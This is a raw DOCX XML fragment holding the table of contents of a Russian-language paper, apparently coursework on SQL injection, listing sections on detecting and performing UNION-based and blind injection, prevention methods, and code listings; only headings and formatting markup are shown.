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rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="172132631"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00EB5DBA" w:rsidRDefault="00EB5DBA">
          <w:pPr>
            <w:pStyle w:val="ab"/>
          </w:pPr>
          <w:r>
            <w:t>Оглавление</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="006012B7">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006012B7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EB5DBA">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="006012B7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc420596235" w:history="1">
            <w:r w:rsidR="00423C8F" w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r w:rsidR="00423C8F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00423C8F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00423C8F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596235 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00423C8F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00423C8F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00423C8F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00423C8F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596236" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sql-Инъекции</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596236 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596237" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Алгоритм выявления возможности внедрения </w:t>
            </w:r>
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596237 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596238" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Алгоритм внедрения </w:t>
            </w:r>
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода с помощью Union оператора</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596238 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596239" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Алгоритм внедрения sql-кода при помощью слепой инъекции</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596239 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596240" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Применение внедрения </w:t>
            </w:r>
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода на собственном приложении</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596240 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596241" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Способы предотвращения sql-инъекций</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596241 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596242" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>1) Использование параметризованных команд</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596242 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596243" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2) Использование хранимых процедур</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596243 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596244" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>3)Проверка всех данных, вводимых пользователем</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596244 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596245" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>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_Toc420596245 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596246" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>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_Toc420596246 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596247" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596247 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596248" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596248 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596249" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг</w:t>
            </w:r>
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596249 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596250" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг</w:t>
            </w:r>
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420596250 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420596251" w:history="1">
            <w:r w:rsidRPr="00D33114">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг 5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
